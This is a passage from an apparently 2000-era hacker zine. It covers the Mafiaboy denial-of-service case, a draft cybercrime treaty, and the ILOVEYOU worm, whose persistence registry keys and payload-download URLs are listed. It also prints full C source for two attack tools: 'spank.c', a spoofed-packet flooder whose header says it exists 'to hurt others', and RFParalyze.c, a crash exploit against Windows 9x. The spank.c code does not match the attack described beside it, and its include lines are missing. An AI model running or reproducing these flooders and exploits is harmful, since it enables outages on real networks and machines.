he’s spoken with a number of others who witnessed the conversations live and verified their authenticity. Mafiaboy Knows Details Moreover, Lyle said he spoke with mafiaboy over the Internet last Thursday and again last Friday and those conversations bolstered the evidence against the young hacker. Mafiaboy also said he was breaking into computers that were using a program called WUFTP, which is often used to exchange data on university computers, Lyle said. Mafiaboy said these computers were using an old version of WUFTP that had security flaws in it and thus he was able to install the attack software on the computers, Lyle said. He is believed to have installed attack software called Tribal Flood Network, or TFN, on dozens of computers, making them into “zombies” that he could then instruct to launch the attacks. Lyle said mafiaboy told him specific details about the ports that he used to connect with the zombie computers and launch the attacks — information that only someone involved in the attack would know. More Than One Attacker The reason investigators believe different culprits were responsible for some of the attacks is that the software tools used to launch the attacks on Yahoo! and eBay were different than those used to attack CNN.com and E*TRADE, Lyle said. The attacks on CNN.com and E*TRADE are believed to have been launched using TFN, a software program that’s widely available on the Internet. The attacks on Yahoo! and eBay were launched using a more sophisticated set of tools, he said. Toronto-based Internet service provider Internet Direct said the Royal Canadian Mounted Police had warned it that a subscriber called “mafiaboy” previously held two accounts with Delphi Supernet, a Montreal ISP the company bought last year. The accounts were closed in March 1998 because mafiaboy violated subscriber policies, but Internet Direct would not say what the violations entailed. Lyle says he has turned his information over to the FBI and has been working with investigators. Based on his conversations with mafiaboy, Lyle said the teen likely committed the attacks to boost his notoriety within the hacker community. “There’s this real effort among the people on all these channels to try and stand out and look like the best hacker, or one of the best,” Lyle said. “And I think that that’s what he was searching after. That really explains why he would brag the way he did about it.” FBI Interviews ‘Coolio’ ABCNEWS has also learned that the FBI has interviewed a hacker called “coolio” in connection with last week’s Web attacks, but he denied any involvement. FBI officials told ABCNEWS’ Brian Ross they had tracked down the teenage hacker in Southern California because they believed he might have useful information for their investigation. Coolio is well known to authorities as a member of “Global Hell,” a group of teenagers who have hacked into White House and Department of Defense computer systems. The officials said members of Global Hell are still under investigation in connection with last week’s Web attacks. The FBI also wants to question a hacker known as “nachoman.” Officials have been careful to say they are not suspects, but just want to talk to them about important information relating to the attacks. Fast-Developing Leads In Washington, FBI Director Louis Freeh said today investigators are running down hundreds of leads related to the Web attacks, but still face substantial hurdles. “There are fast developing leads as we speak,” Freeh told a Senate subcommittee. Freeh said the investigation has led the FBI to at least four other countries, including Canada and Germany. He also said FBI field offices in five cities are participating in the investigation: Los Angeles, San Francisco, Atlanta, Boston and Seattle. The FBI began investigating after leading Web portal Yahoo! was attacked and made inaccessible for several hours on Feb. 7. Then, on Feb. 8, Buy.com, Amazon.com, eBay and CNN.com were assaulted. And on Feb. 10, technology site ZDNet and online trading site E*TRADE suffered attacks. As many as 13 Web sites may have been attacked. Known as denial-of-service attacks, the assaults effectively overloaded Web sites with mock traffic so that real users couldn’t access the sites. The culprits took over computers in various parts of the world and used them to bombard the victims’ sites with data. Investigators have located more than a half-dozen computers used in last week’s attacks. Computers at two California universities, a Midwestern school, a Berlin university, a non-university site in Southern California, a home business in Oregon, and machines at least four companies were used as “zombies.” @HWA 11.4 Mafiaboy:Hacker cripples Area 51 site for 36 hours ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 04/21/00- Updated 11:36 AM ET Hacker cripples Area 51 site for 36 hours RALEIGH, N.C. (AP) - A hacker disrupted service for 36 hours to the Web site that displays detailed satellite images of Area 51, the top-secret Air Force site in Nevada. Raleigh-based Aerial Images Inc. said the hacker struck six hours after five images of the desert proving ground were loaded Monday night onto the site, www.terraserver.com. The attack, combined with traffic 10 times what the site usually bears, meant millions of people had difficulty accessing the site or could not connect with it at all, company officials said. Service was disrupted until Thursday. ''I won't tell you it's completely solved,'' said John Hoffman, Aerial Images president. ''We've taken steps to mitigate its effect. It's almost a fact of being online these days.'' Hoffman declined to provide details of the attack, citing an ongoing investigation. The Air Force only recently acknowledged that Groom Dry Lake Air Force Base even exists. Among UFO aficionados, it has long been known simply as Area 51, the base's designation on old Nevada test site maps. They believe that unidentified flying objects from other worlds are hidden there. @HWA xx.x [ISN] Clearing up questions about denial of service attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [Forwarded by: Mark Arena ] Hi all, I just thought I'd clear up all these rumors, questions etc regarding the denial of service attacks which happened a while ago. 1) Did mafiaboy use trinoo or smurf? He didnt use either. He used a program called mstream and yes its private. It basically is similar to trinoo. It comprises of a client and a server. With the server it listens on port 7983 and you specify the hosts which will connect to the server on that port. For that reason you must have been added to the server to packet from it. On the server.c program is appears like this: char *m[]={ "1.1.1.1", /* first master */ "2.2.2.2", /* second master */ "3.3.3.3", /* third master etc */ 0 }; Now as for the client you can define a password, serverfile and max number of users to use the client at one time. The client then connects to the servers and gets the servers to send all crap data to the host you specify and hence if you got enough servers will take them down eg as mafiaboy did. 2) So did mafiaboy actully hack anything? The answer is yes. All the machine he installed the server on he had to have root. Therefore he must have hacked a lot of machines in preparation for the attack on the sites. 3) Did mafiaboy take out all the sites? No, mafiaboy only took out yahoo, etrade and some others which I cant remember. Coolio took out the rest. No matter what you're told I assure you Coolio took out the rest. 4) How come it took so long for mafiaboy to get arrested? Simple he hanged low and the fbi etc had not enough evidence to make an arrest that was until his outburst on self-evident's msg board. His allowed the fbi etc to swoop swiftly and quickly. Now its time for my opinion: 1) Do you think mafiaboy will get convicted? Well it depends, if mafiaboy admits to dos'ing those sites then yes I believe he will be convicted then again if he denies it I believe they won't have enough evidence on him. The only reason they caught him is that his nick etc was posted on www.self-evident.com He also said to a person I know that he destroyed the hard drive in a fire which would give the fbi no physical evidence at his end. Mafiaboy's story: Here is a quick rephraze of what mafiaboy has said in channels before he got arrested. His nick has been edited out for various reasons. <> god fucking damnit <> i wish i can go back in time <> and undo what i did In closing I'll tell you how I know this. Firstly I have spoken to people associated with mafiaboy. I also have the program which he used to take out the sites and no I won't send you it. Any other questions etc direct them to me and i'll try answering them. ------------------------------------------------------- Mark Arena marena@iinet.net.au ------------------------------------------------------- @HWA 13.0 [MM] Cybercrime Solution Has Bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.wired.com/news/politics/0,1283,36047,00.html Cybercrime Solution Has Bugs by Declan McCullagh 3:00 a.m. May. 3, 2000 PDT WASHINGTON -- U.S. and European police agencies will receive new powers to investigate and prosecute computer crimes, according to a preliminary draft of a treaty being circulated among over 40 nations. The Council of Europe's 65KB proposal is designed to aid police in investigations of online miscreants in cases where attacks or intrusions cross national borders. But the details of the "Draft Convention on Cybercrime" worry U.S. civil libertarians. They warn that the plan would violate longstanding privacy rights and grant the government far too much power. The proposal, which is expected to be finalized by December 2000 and appears to be the first computer crime treaty, would: Make it a crime to create, download, or post on a website any computer program that is "designed or adapted" primarily to gain access to a computer system without permission. Also banned is software designed to interfere with the "functioning of a computer system" by deleting or altering data. Allow authorities to order someone to reveal his or her passphrase for an encryption key. According to a recent survey, only Singapore and Malaysia have enacted such a requirement into law, and experts say that in the United States it could run afoul of constitutional protections against self-incrimination. Internationalize a U.S. law that makes it a crime to possess even digital images that "appear" to represent children's genitals or children engaged in sexual conduct. Linking to such a site also would be a crime. Require websites and Internet providers to collect information about their users, a rule that would potentially limit anonymous remailers. U.S. law enforcement officials helped to write the document, which was released for public comment last Thursday, and the Justice Department is expected to urge the Senate to approve it next year. Other non-European countries actively involved in negotiations include Canada, Japan, and South Africa. During recent testimony before Congress, Attorney General Janet Reno warned of international computer crime, a claim that gained more credibility last month with the arrest of alleged denial-of-service culprit Mafiaboy in Canada. "The damage that can be done by somebody sitting halfway around the world is immense. We have got to be able to trace them, and we have made real progress with our discussions with our colleagues in the G-8 and in the Council of Europe," Reno told a Senate appropriations subcommittee in February, the week after the denial-of-service attacks took place. "Some countries have weak laws, or no laws, against computer crimes, creating a major obstacle to solving and to prosecuting computer crimes. I am quite concerned that one or more nations will become 'safe havens' for cyber-criminals," Reno said. Civil libertarians say the Justice Department will try to pressure the Senate to approve the treaty even if it violates Americans' privacy rights. "The Council of Europe in this case has just been taken over by the U.S. Justice Department and is only considering law enforcement demands," says Dave Banisar, co-author of The Electronic Privacy Papers. "They're using one more international organization to launder U.S. policy." Banisar says Article 6 of the measure, titled "Illegal Devices," could ban commonplace network security tools like crack and nmap, which is included with Linux as a standard utility. "Companies would be able to criminalize people who reveal security holes about their products," Banisar said. "I think it's dangerous for the Internet," says Barry Steinhardt, associate director of the American Civil Liberties Union and a founder of the Global Internet Liberty Campaign. "I think it will interfere with the ability to speak anonymously." "It will interfere with the ability of hackers -- using that term in a favorable light -- to test their own security and the security of others," Steinhardt said. Solveig Singleton, director of information studies at the libertarian Cato Institute says it's likely -- although because of the vague language not certain -- that anonymous remailers will be imperiled. The draft document says countries must pass laws to "ensure the expeditious preservation of that traffic data, regardless whether one or more service providers were involved in the transmission of that communication." A service provider is defined as any entity that sends or receives electronic communications. Representing the U.S. in the drafting process is the Justice Department's Computer Crime and Intellectual Property section, which chairs the G-8 subgroup on high-tech crime and also is involved with a cybercrime project at the Organization of American States. In December 1997 Reno convened the first meeting on computer crime of the G-8 nations. A recent White House working group, which includes representatives from the Justice Department, FBI, and Secret Service has called for restrictions on anonymity online, saying it can provide criminals with an impenetrable shield. So has a report from a committee of the European Parliament. Other portions of the treaty include fairly detailed descriptions of extradition procedures and requirements for countries to establish around-the-clock computer-crime centers that police groups in other countries may contact for immediate help. The Council of Europe is not affiliated with the European Union, and includes over 40 member nations, including Russia, which joined in 1996. After the Council of Europe's expert group finalizes the proposed treaty, the full committee of ministers must adopt the text. Then it will be sent to countries for their signatures. Comments can be sent to daj@coe.int. @HWA 14.0 [IND] The new spank.c DoS attack tool source and an analysis paper by 1st ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ------------------------------------------------ Explanation of the 'spank' attack -- a new breed stream/raped ------------------------------------------------ By: lst (yardley@uiuc.edu) This is a tad different than the previous release. Stream/Raped mearly flooded the host with ack's (or no flags) and came from random ips with random sequence numbers and/or ack numbers. The difference now is that this not only does the previous stuff, but also directly attacks from and to multicast addresses as well. Just as before, rate limiting should be done to counteract its effect (the same idea as ICMP_BANDLIM). The multicast handling should also be checked to verify that it is behaving properly. The attacker specifies the port[s] that they want to send the attack to, depending on what ports are selected, you will have different net results. If the port is an open port, then you will possibly have a longer kernel path to follow before the drop. Therefore, a smart attacker will hit open ports, but havoc can also come about from random ports due to states and processing. In the best case scenario, you will experience only the lag of the flood and the lag of the processing (currently) and then be fine when the attacker stops, In the worst case, you lockup, kill the network, and possibly have to reboot. Once you patch it, you deal with a lot less processing time (the drops are handled without the RST flag when appropriate--bandlim type idea). In other words, you go to the drop routine instead of dropwithrst silencing your response, which decreases your processing time, the hit on your network, and the effect of the flood (once a threshold is reached, all those bad packets are silently dropped and the attack has less of a net effect). The filters that were presented at the beginning of this email will block all multicast packets that come out (and in) the tcp stack I have been getting mailed a lot about this. Here is why I said the previous statement. Receiving a packet with no flags is considered an illegal packet (obviously) and is often dumped, however, as we have seen in the past, illegal packets often wreak havoc and often go untested. There is very little that "raped.c" or "stream.c" actually showed as problems in the TCP/IP stacks. The true problem lies more in the effects of the response (caused by the attack). This is the same concept as the SYN floods of yesteryear, and the same type of thing will be done to handle it. The main difference is that it will be on a simpler note because there isn't much need for a "cookie" based system. One should just throttle the response of the reset packets which in turn will help stop the storm that you generate and in general, harden the tcp/ip stack to behave the way it is supposed to. The main effect of this attack is that you are shooting back RST+ACK's at all the spoofed hosts. Obviously, a lot of these hosts will not exist and you will get ICMP unreaches (as an example) bounced back at you. There are other possibilities as well, but unreach would be the most common (redirects might be common as well although i did not spend the time to analyze that). The ones that don't respond back may send you some packets back as well (depending on if the port was valid or not and what their firewall rules are). This type of attack is complicated by the multicasts, and the effect is amplified as well. All in all, it becomes very nasty very quick. Basically, this causes a nice little storm of packets, in the ideal case. Note that I said ideal case in the previous paragraph. This is not always the observed behavior. It all depends on what is on the subnet, what type of packets are recieved, what rules and filters you have setup, and even the duration of the flood. It has been pointed out several times that the machine will go back to normal once the attack is stopped, which is exactly why something like ICMP_BANDLIM will work. I have also been asked a lot about what this "bug" affects. I have seen it have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has also seemed to affect some hubs, switches, routers, or gateways since entire subnets have "disappeared" briefly after the attack. The multicast attack seems to be more deadly to teh network than the previous attack and its affects get amplified and even carried over to the rest of the network (bypassing secluded network bounds). I don't have more specifics on the systems affected because of the difficulty in testing it (and keeping the network up) since I do not have local access to the networks that I tested on, and remote access gets real ugly real fast. Another possibility that has been suggested as to why some machines die is that the machine's route table is being blown up by the spoofed packets. Each spoofed packet has a different source address which means that a temporary route table entry is being created for each one. These entries take time to timeout. Use 'vmstat -m' and check the 'routetbl' field while the attack is going on. Route table entries can be controlled somewhat under freebsd with: [root@solid]::[~] sysctl -a | fgrep .rt net.inet.ip.rtexpire: 3600 net.inet.ip.rtminexpire: 10 net.inet.ip.rtmaxcache: 128 You can do the following, to help if the route table is at least part of the problem: sysctl -w net.inet.ip.rtexpire=2 sysctl -w net.inet.ip.rtminexpire=2 Things that will help: 1. Drop all multicast packets (ingress and egress) that are addressed to the tcp stack because multicasts are not valid for tcp. 2. Extend bandwidth limiting to include RST's, ACK's and anything else that you feel could affect the stability of the machine. 3. Don't look for listening sockets if the packet is not a syn I hope that this helps, or explains a little more at least. --------------------------------------------------- Temporary remedy --------------------------------------------------- If you use ipfilter, this MAY help you, but the issue is quite a bit different than the previous issue. -- start rule set -- block in quick proto tcp from any to any head 100 block in quick proto tcp from 224.0.0.0/28 to any group 100 pass in quick proto tcp from any to any flags S keep state group 100 pass out proto tcp from any to any flags S keep state pass in all -- end rule set -- optionally, a rule like the following could be inserted to handle outgoing packets (if they send from the firewall somehow) but you have bigger problems than the attack if that is the case. -- start additional rule -- block out proto tcp from any to 224.0.0.0/28 -- end additional rule -- That will help you "stop" the attack (actually it will just help minimize the affects), although it will still use some CPU though Note: If you use IPFW, there is no immediate way to solve this problem due to the fact that it is a stateless firewall. If you are getting attacked, then temporarily use ipfilter (or any other state based firewall) to stop it. Otherwise, wait for vendor patches or read more about the explanation for other possible workarounds. FreeBSD "unofficial patch" by Don Lewis: http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff ----------------------- Conclusion ----------------------- This bug was found in testing. It seems a bit more lethal than the previous and should be addressed as such. Patches should be available now, but I do not follow all the platforms. -------------------- References -------------------- This was done independantly, although some of the analysis and reverse engineering of concept was done by other people. As a result, I would like to give credit where credit is due. The following people contributed in some way or another: Brett Glass Alfred Perlstein Warner Losh Darren Reed Don Lewis Also, I would like to send shouts out to w00w00 (http://www.w00w00.org) ------------------- Attached ------------------- These programs are for the sake of full disclosure, don't abuse them. Spank was written with libnet, so you will need to obtain that as well. You can find that at http://www.packetfactory.net/libnet For an "unofficial" patch: http://www.w00w00.org/files/spank/don_lewis_tcp.diff For spank.c: http://www.w00w00.org/files/spank/spank.c -=- /* * spank.c by fred_ | blasphemy * * @@@@@@ @@@@@@@ @@@@@@ @@@ @@@ @@@ @@@ * @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ @@@ @@@ @@@ * !@@ @@! @@@ @@! @@@ @@!@!@@@ @@! !@@ * !@! !@! @!@ !@! @!@ !@!!@!@! !@! @!! * !!@@!! @!@@!@! @!@!@!@! @!@ !!@! @!@@!@! * !!@!!! !!@!!! !!!@!!!! !@! !!! !!@!!! * !:! !!: !!: !!! !!: !!! !!: :!! * !:! :!: :!: !:! :!: !:! :!: !:! * :::: :: :: :: ::: :: :: :: ::: * :: : : : : : : :: : : ::: * * This program is not for educational use * in any shape or form. You must agree that * you will only use it to hurt others. * * Warning, this program uses alot of bandwidth. * * usage: ./spank * */ #include #include #include #include #include #include #include #include #include #include #include #include static int in_cksum(u_short *addr, int len); static void fill(int datalen, char *icmp_data); #define PHDR_LEN sizeof(struct icmphdr) + sizeof(struct iphdr) static void fill(int datalen, char *icmp_data) { static u_int32_t rnd; int i; for (i = PHDR_LEN; i < datalen; i++) { rnd = (3141592621U * rnd + 663896637U); icmp_data[i] = rnd>>24; } } int main(int argc, char *argv[]) { int count = 0, sock, x; struct sockaddr_in sin; fprintf(stdout, "spank.c coded by fred_ | blasphemy\n"); if (argc != 4) { fprintf(stderr, "ex., %s \n", argv[0]); exit(1); } if (atoi(argv[3]) < 1) { fprintf(stderr, "error: packet size is too small.\n"); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(0); sin.sin_addr.s_addr = get_addr(argv[2]); sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sock < 0) { perror("socket()"); exit(1); } setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &x, sizeof(x)); printf("each '.' is 25 packets\n"); while (1) { send_packet(argv[1], atoi(argv[3]), sin, sock); count++; if (count == 25) { printf("."); fflush(stdout); count = 0; } usleep(10); } } int get_addr(char *host) { static struct in_addr h; struct hostent *hp; h.s_addr = inet_addr(host); if (h.s_addr == -1) { hp = gethostbyname(host); if (hp == NULL) { fprintf(stderr, "unable to resolve %s.\n", host); exit(1); } bcopy(hp->h_addr, (char *)&h.s_addr, hp->h_length); } return h.s_addr; } int send_packet(char *src, int size, struct sockaddr_in sin, int sock) { char *packet; struct icmphdr *icmp; struct iphdr *ip; packet = (char *) malloc(PHDR_LEN + size); ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(packet, 0, PHDR_LEN); fill(size, packet); ip->tot_len = htons(PHDR_LEN + size); ip->ihl = 5; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->version = 4; ip->tos = 0; ip->frag_off = 0; ip->saddr = get_addr(src); ip->daddr = sin.sin_addr.s_addr; ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); icmp->type = 8; icmp->code = 1; icmp->checksum = in_cksum((u_short *)icmp, sizeof(struct icmphdr)); if (sendto(sock, packet, PHDR_LEN + size, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { close(sock); perror("sendto()"); exit(1); } free(packet); } static int in_cksum(u_short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } @HWA 15.0 [IND] RFParalyse.c:Cause undesired effects remotely against Win9x; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.wiretrip.net/rfp/ http://www.el8.org/adv/05012000_win98_winpopup.txt --/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\-- / / / e / - el8.org advisory / l / / 8 / - Evan Brewer / . / - Rain Forest Puppy / o / / r / - Synopsis: Cause undesired effects remotely against / g / win9[5,8] through an oddly formed winpopup message. / / --/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\-- Details: Through a netbios session request packet with a NULL source name, Windows 9[5,8] show a number of odd responses. Everything from lockups, reboots and "the blue screen of death", to total loss of network connectivity. Note that neither el8 or wiretrip discovered the vulnerability; instead, a binary-only exploit found in the wild was reversed, and the demonstration code attached was reconstructed. So it should be noted: THIS HAS BEEN FOUND IN THE WILD The vulnerability specificly targets the Messenger service on Windows 9[5,8]. At this point, it's doubtful there's anything more worthy than a DoS capable. However, any information to the contrary would be appreciated. :) Source: Attached is a quick hack called RFParalyze.c Greets: ADM / w00w00 / everyone at el8.org --/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\-- /*********************************** www.el8.org **** www.wiretrip.net **/ /* - el8.org advisory: RFParalyze.c code by rain forest puppy - coolness exhibited by Evan Brewer - :q (n0where)[/home/sas] cat RFparalyse.txt --/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\-- / / / e / - el8.org advisory / l / / 8 / - Evan Brewer / . / - Rain Forest Puppy / o / / r / - Synopsis: Cause undesired effects remotely against / g / win9[5,8] through an oddly formed winpopup message. / / --/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\-- Details: Through a netbios session request packet with a NULL source name, Windows 9[5,8] show a number of odd responses. Everything from lockups, reboots and "the blue screen of death", to total loss of network connectivity. Note that neither el8 or wiretrip discovered the vulnerability; instead, a binary-only exploit found in the wild was reversed, and the demonstration code attached was reconstructed. So it should be noted: THIS HAS BEEN FOUND IN THE WILD The vulnerability specificly targets the Messenger service on Windows 9[5,8]. At this point, it's doubtful there's anything more worthy than a DoS capable. However, any information to the contrary would be appreciated. :) Source: Attached is a quick hack called RFParalyze.c Greets: ADM / w00w00 / everyone at el8.org --/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\-- /*********************************** www.el8.org **** www.wiretrip.net **/ /* - el8.org advisory: RFParalyze.c code by rain forest puppy - coolness exhibited by Evan Brewer - - Usage: RFParalyze where is the IP address (duh) of the target (note: not DNS name). is the NetBIOS name (again, duh) of the server at the IP address given. A kiddie worth his scripts should be able to figure out how to lookup the NetBIOS name. Note: NetBIOS name must be in upper case. This code was made from a reverse-engineer of 'whisper', a binary-only exploit found in the wild. I have only tested this code on Linux. Hey, at least it's not in perl... ;) -rfp */ #include /* It's such a shame to waste */ #include /* this usable space. Instead, */ #include /* we'll just make it more */ #include /* props to the men and women */ #include /* (hi Tabi!) of #!adm and */ #include /* #!w00w00, because they rock */ #include /* so much. And we can't forget*/ #include /* our friends at eEye or */ #include /* Attrition. Oh, +hi Sioda. :) */ /* Magic winpopup message This is from \\Beav\beavis and says "yeh yeh" Ron and Marty should like the hardcoded values this has ;) */ char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49" "\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00"; struct sreq /* little structure of netbios session request */ { char first[5]; char yoname[32]; char sep[2]; char myname[32]; char end[1]; }; void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/ int main(int argc, char *argv[]){ char buf[4000], myname[33], yoname[33]; struct sockaddr_in sin; int sox, connex, x; struct sreq smbreq; printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n"); if (argc < 3) { printf("Usage: RFParalyze \n"); printf(" --IP must be ip address, not dns\n"); printf(" --NetBIOS name must be in UPPER CASE\n\n"); exit(1);} printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n"); Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */ myname[30]='A'; /* how was Beltaine? :) */ myname[31]='D'; Pad_Name(argv[2],yoname); yoname[30]='A'; yoname[31]='D'; printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]); sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_family = AF_INET; sin.sin_port = htons(139); sox = socket(AF_INET,SOCK_STREAM,0); if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){ perror("Problems connecting: "); exit(1);} memset(buf,0,4000); memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/ memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/ memcpy(smbreq.end,"\x00",1); /*what it does :) */ strncpy(smbreq.myname,myname,32); strncpy(smbreq.yoname,yoname,32); write(sox,&smbreq,72); /* send initial request */ x=read(sox,buf,4000); /* get their response */ if(x<1){ printf("Problem, didn't get response\n"); exit(1);} if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill..."); else {printf("We didn't get back the A-OK, bailing.\n"); exit(1);} write(sox,&blowup,72); /* send the magic message >:) */ x=read(sox,buf,4000); /* we really don't care, but sure */ close(sox); printf("done\n"); } void Pad_Name(char *name1, char *name2) { char c, c1, c2; int i, len; len = strlen(name1); for (i = 0; i < 16; i++) { if (i >= len) { c1 = 'C'; c2 = 'A'; /* CA is a space */ } else { c = name1[i]; c1 = (char)((int)c/16 + (int)'A'); c2 = (char)((int)c%16 + (int)'A'); } name2[i*2] = c1; name2[i*2+1] = c2; } name2[32] = 0; /* Put in the null ...*/ } /*********************************** www.el8.org **** www.wiretrip.net **/ -/-\----/-\----/-\----/-\----/-\----/-\---/ fjear the ASCii skillz \---/-\- @HWA 16.0 [MM] New worm: ILOVEYOU spreads via e-mail attachments ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This email worm originated in the Phillipines, when I first became aware of it Britain was being hit hard by the nuisance, and by late afternoon the same day it had proliferated across the net to the U.S and Canada I got a call from my sister at work who had recieved 16 ILOVEYOU emails at that time, later on the media began reporting it and in my news emails that were warning of the virus the very same emails were themselves infected and multiple copies were received. Not 24hrs had passed before several variations of the insiduous pest had appeared such as the JOKE and VERY FUNNY variations. You'd think we were past this sort of annoyance but it seems shoddy programming and planning is going to be a fact of life for a good while to come yet. - Ed Media: Source: http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000504095618.N24513@securityfocus.com [ by Message ] [ by Thread ] [ Post ][ Reply ] To:BugTraq Subject:ILOVEYOU worm Date:Wed May 03 2000 18:56:18 Author: Elias Levy Message-ID:<20000504095618.N24513@securityfocus.com> A new VB worm is on the loose. This would normally not be bugtraq material as it exploits no new flaws but it has spread enough that it warrants some coverage. This is a quick and dirty analysis of what it does. The worm spreads via email as an attachments and via IRC as a DCC download. The first thing the worm does when executed is save itself to three different locations. Under the system directory as MSKernel32.vbs and LOVE-LETTER-FOR-YOU.TXT.vbs and under the windows directory as Win32DLL.vbs. It then creates a number of registry entries to execute these programs when the machine restarts. These entries are: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL It will also modify Internet Explorer's start page to point to a web page that downloads a binary called WIN-BUGSFIX.exe. It randomly selects between four different URLs: http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe I've not been able to obtain copy of the binary to figure out what it does. This does mean the worm has a dynamic components that may change its behavior any time the binary is changed and a new one downloaded. The worm then changes a number of registry keys to run the downloaded binary and to clean up after itself. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page about:blank The worm then creates an HTML file that helps it spread, LOVE-LETTER-FOR-YOU.HTM. This is the file DCC'ed to others on IRC. The worm then spreads to all addresses in the Windows Address Book by sending the file LOVE-LETTER-FOR-YOU.TXT.vbs as an attachment. The email starts: kindly check the attached LOVELETTER coming from me. Then the virus searches for attached drives looking for files with certain extensions. It overwrites files ending with vbs, and vbe. It overwrites files ending with js, jse, css, wsh, sct, and hta, and then renames them to end with vbs. It overwrites files ending with jpg and jpeg and appends .vbs to their name. It finds files with the name mp3 and mp3, creates vbs files with the same name and sets the hidden attribute in the original mp* files. The it looks for the mIRC windows IRC client and overwrites the script.ini file if found. It modifies this file to that it will DCC the LOVE-LETTER-FOR-YOU.HTM file to any people that join a channel the client is in. You can find the source of the worm at: http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1 -- Elias Levy SecurityFocus.com http://www.securityfocus.com/ Si vis pacem, para bellum -=- I-Worm.LoveLetter I-Worm.LoveLetter is Internet worm written in the scripting language "Visual Basic Script" (VBS). It works only on computers on which the Windows Scripting Host (WSH) is installed. In Windwos 98 and Windows 2000, WHS is installed by default. The worm performs destructive actions and sends its copy bye E-mail. Destructive actions After starting from the VBS file the worm searches all files on all local and mapped network drivers. For some extensions of filenames the worm does the following: VBS, VBE: Overwrites files with the worm body. JS, JSE, CSS, VSH, HST, HTA: Creates a new file with original filename and extention .VBS and deletes original file. JPG, JPEG: Creates new file with extention .VBS (adds this extention to old file name and extention) (i.e. PIC1.JPG.VBS). Writes worm body to it and deletes original file. MP2, MP3: Creates a new file with extention .VBS (adds to old file name, see above for details). It writes its body to it and sets thef file attribute "hidden" to the original file. MIRC32.EXE, MLINK32.EXE, SCRIPT.INI, MIRC.HLP, MIRC.INI: If one of these files was found the worm creates the file SCRIPT.INI in the directory were one of the above files resides. The worm also creates some files with its body in system directory. MSKERNEL32.VBS, WIN32DLL.VBS, LOVE-LETTER-FOR-YOU.TXT.VBS It sets appropriates keys in the system registry (Automatic run keys) with full names of files: MSKernel32.vbs, Win32DLL.vbs It adds system registry keys: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL Spreading via E-mail The 